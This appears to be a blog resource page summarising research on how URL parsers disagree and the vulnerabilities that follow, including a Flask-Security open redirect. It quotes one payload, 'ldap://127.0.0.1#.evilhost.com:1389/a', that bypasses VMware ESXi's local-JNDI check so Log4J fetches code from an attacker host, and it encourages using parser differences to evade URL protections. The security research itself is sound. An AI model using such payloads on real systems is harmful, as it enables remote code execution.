Resources
People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!
- The authors of this article decided to examine the implementation of 16 URL parsers. From Python libraries such as urllib to browsers to Curl. An interesting item they call out is there are multiple revisions and definitions of URLs, which likely causes the discrepancies.
- A URL is made up of many points:
scheme://authority/path?query#fragment. Any one of these could cause many security issues depending if the two different libraries parse the URL properly. - The first example they give is a bypass for the local JNDI protection in VMWare ESXi Server. With the recent Log4J vulnerability, the RCE was only possible if a non-local URL could pull down an exploit Java class. Two different parsers were used in order to VERIFY and USE this URL. This causes the problem.
ldap://127.0.0.1#.evilhost.com:1389/ais the URL. The verifier thought that the URL was 127.0.0.1 but the actual URl was evilhost.com! The discrepancies between verifier and usage are the reason for many security issues!- From this research, 8 CVEs came out of it. For instance, an Open Redirect was found in
Flask-Securityby providing a URL with too many backslashes in the scheme. - Only some of these parsing bugs were fixed! If you are searching for a way to bypass URL protections, knowing the differences between these parsers can bear much fruit! Giving this a read for all of the small details may be helpful in the future.
